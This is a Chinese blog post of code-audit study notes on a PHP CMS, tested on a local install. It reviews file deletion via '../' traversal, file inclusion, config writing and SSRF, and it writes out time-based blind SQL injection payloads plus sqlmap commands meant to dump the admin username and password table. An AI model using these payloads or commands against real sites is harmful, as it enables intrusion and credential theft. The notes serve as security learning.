美文网首页
代码审计初尝

代码审计初尝

作者: 萍水间人 | 来源:发表于2020-02-22 23:03 被阅读0次

@(代码审计学习笔记)

[TOC]

代码审计初尝

[图片上传失败...(image-f76662-1582383795972)]

任意文件删除

文件删除函数只考虑到了白名单路径,但是没有想到 ../

function del_file()
{
    $path = post('path');
    $path = str_replace('../','',$path);
    $dir[0] = 'data/backup/';
    $dir[1] = 'images/';
    $dir[2] = 'resource/';
    $flag = false;
    for($i = 0; $i < count($dir); $i ++)
    {
        if(substr($path,0,strlen($dir[$i])) == $dir[$i])
        {
            $flag = true;
        }
    }
    if($flag)
    {
        if(unlink($path))
        {
            $result = 1;
        }
    }
    echo isset($result) ? $result : 0;
}

根目录新建 aaaa.txt
然后发送请求
[图片上传失败...(image-115a70-1582383795972)]

成功删除文件

后台注入

延时注入

or if(length(database())=6,sleep(3),0)
如果数据库名的长度为6,那么就 sleep(3)
我测试的时候数据库名为 xinxiu ,所以就会出现一定的延时
[图片上传失败...(image-82f0a8-1582383795972)]

延时注入的其他例子

# 判断当前数据库长度 # 当前数据库长度是否为 1 没有延时 不是 cmd=del_admin&id=3 or if(length(database())=1,sleep(3),0) # 延时 表明当前数据库长度为 6 cmd=del_admin&id=3 or if(length(database())=6,sleep(3),0) # 当前数据库第1个字母的ascii码是否为 97 没有延时 不是 cmd=del_admin&id=3 or if(ascii(mid(database(),1,1))=97,sleep(3),0) # 延时 表明当前数据库第1个字母的ascii码为 115 即 's' cmd=del_admin&id=3 or if(ascii(mid(database(),1,1))=115,sleep(3),0) # 当前数据库第2个字母的ascii码是否为 97 没有延时 不是 cmd=del_admin&id=3 or if(ascii(mid(database(),2,1))=97,sleep(3),0) # 延时 表明当前数据库第2个字母的ascii码为 105 即 'i' cmd=del_admin&id=3 or if(ascii(mid(database(),2,1))=105,sleep(3),0) ...

注意这里不能用 and ,因为这个 id=3 的用户实际上不存在,所以就不再需要去执行 and 另一边的语句了(短路!)

但是如果这个用户存在当然是可以的咯(那样注入就很麻烦了)
[图片上传失败...(image-28fc8d-1582383795972)]

但是我按照国光的方法使用 sqlmap 失败了

./sqlmap.py -u "http://127.0.0.1/admin.php?/deal/dir-basic/" --cookie="qaq21129s234bj1q4ammcs7fe5;" --data="cmd=del_admin&id=3" -p "id" --technique=T --random-agent -v 3 --tamper="between" -D 'sinsiu' -T 'php_admin' -C 'adm_id,adm_username,adm_password' --dump

[图片上传失败...(image-a426d8-1582383795972)]

另一处后台注入

search_main.php 文件

    $global['key'] = rawurldecode($global['key']);
    $obj = new goods();
    $obj->set_field('goo_id,goo_title,goo_x_img');
    $obj->set_where("goo_title like '%" . $global['key'] . "%'");
    $obj->set_where('goo_channel_id = '.get_id('channel','cha_code','goods'));

这里忘记过滤了

$obj->set_where("goo_title like '%" . $global['key'] . "%'");

[图片上传失败...(image-77c37-1582383795972)]

同样的尝试使用 sqlmap 但是还是失败了(怕是个假的吧)

 ./sqlmap.py -u "http://localhost/?/search/index.html/key-%27*%20%23/" -v 3 --technique=T -D 'sinsiu' -T 'php_admin' -C 'adm_id,adm_username,adm_password' --dump

文件包含

admin/basic_func.php 中:

$global['channel'] 参数可控,比如访问 /admin.php?/service/mod-user_sheet/,那么获取到的是 service ,之后判断文件是否存在进行包含

    global $global;
    $global = array();
    var_dump($_SERVER['QUERY_STRING']);
    $global['url'] = $filter($_SERVER['QUERY_STRING']);
    if($global['url'] != '')
    {
        $arr = explode('/',$global['url']); //以 / 做分隔符
        $global['channel'] = $arr[1];
        var_dump($global);

[图片上传失败...(image-39a35d-1582383795972)]

function main()
{
    global $global,$smarty;
    set_global();
    include_all('admin/class');
    set_more_global();
    $path = 'admin/admin.php';
    if($global['url'] != '')
    {
        $path2 = 'admin/'.$global['channel'].'.php'; //获取到 $global['channel'] 这个参数可控
        var_dump(file_exists($path2));
        if(file_exists($path2))
        {
            $path = $path2;
        }
    }
    include($path);
}

但是这里如果传入 ../ 那么就会导致 file_exists 返回错误,所以暂时无能为力

admin/common.func.php 文件中

function run($parameter)
{
    global $smarty;
    $path = '';
    $display = '';
    extract($parameter); //extract函数存在变量覆盖,但是参数不可控
    $func = 'module_'.$module;
    include('admin/module/'.$path.$module.'.php');
    $func($parameter);
    if($display != 'no')
    {
        $smarty->display('module/'.$path.$module.'.php');
    }
}

任意写文件

common.func.php 存在一处编辑配置文件

[图片上传失败...(image-f46649-1582383795972)]

当然此处是可以随意修改文件的,只是没办法写shell
[图片上传失败...(image-2d1a3b-1582383795972)]

可见过滤还是挺严格的

[图片上传失败...(image-9147d4-1582383795972)]

SSRF

getRemoteImage.php 文件中,

可以获取远程图片

首先必须是 http开头的

if(strpos($imgUrl,"http")!==0){
                array_push( $tmpNames , "error" );
                continue;
            }

校验了后缀名

            $fileType = strtolower( strrchr( $imgUrl , '.' ) );
            if ( !in_array( $fileType , $config[ 'allowFiles' ] ) || stristr( $heads[ 'Content-Type' ] , "image" ) ) {
                array_push( $tmpNames , "error" );
                continue;
            }

相关的白名单

    $config = array(
        "savePath" => "../../images/editor/" ,            //保存路径
        "allowFiles" => array( ".gif" , ".png" , ".jpg" , ".jpeg" , ".bmp" ) , //文件允许格式
        "maxSize" => 30000                    //文件大小限制,单位KB
    );

之后会读取文件

readfile( $imgUrl,false,$context);

这么看来感觉问题不大

参考

PHP代码审计初尝

相关文章

  • 代码审计初尝

    @(代码审计学习笔记) [TOC] 代码审计初尝 [图片上传失败...(image-f76662-15823837...

  • 【代码审计】PHP代码审计

    1. 概述 代码审核,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应用程序在开发阶段存在的一...

  • 代码审计

    代码审计工具 1、三款自动化代码审计工具教程2、seay源代码审计系统 PHP核心配置详解 注意PHP各个版本中配...

  • 🎐代码审计

    ?源代码审计分为白盒、黑盒、灰盒 白盒:拥有源代码进行审计黑盒:不知道源代码的情况下进行渗透审计灰盒:介于黑盒与白...

  • 2021-12-06-java代码审计初步认知

    一、代码审计的定义代码审计是一种以发现安全漏洞,程序错误和程序违规为目标的源代码分析技能。 二、代码审计需要的能力...

  • 初尝

    高枕虽不虞,惊起皆空虚; 耳添丝竹乐,确乱三千丝。

  • 初尝

    继上次中午和二哥聊了很久之后,心里一直想的就是『不忘初心』,便重新尝试找回留学时的冲劲,更多的去接受新的东西。成也...

  • 初尝

    社会真的有那么残酷吗? 谈恋爱就是看脸和身材,前几天学姐说:“又有谁看你的舞姿不过就是看脸和身材”学姐很漂亮,说得...

  • 初尝

    每每看到别人记录的点点滴滴都有动笔写下自己的生活的念头,本身自己就是一个爱忘记生活过往的人,一年前的事情被家人朋友...

  • 代码审计思路之PHP代码审计

    00×0 前言 最近也是边挖src边审计代码,总结下最近的php代码审计的一些思路,我一般按照顺序往下做,限于能力...

网友评论

      本文标题:代码审计初尝

      本文链接:https://www.haomeiwen.com/subject/ctzrqhtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|代码审计初尝|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!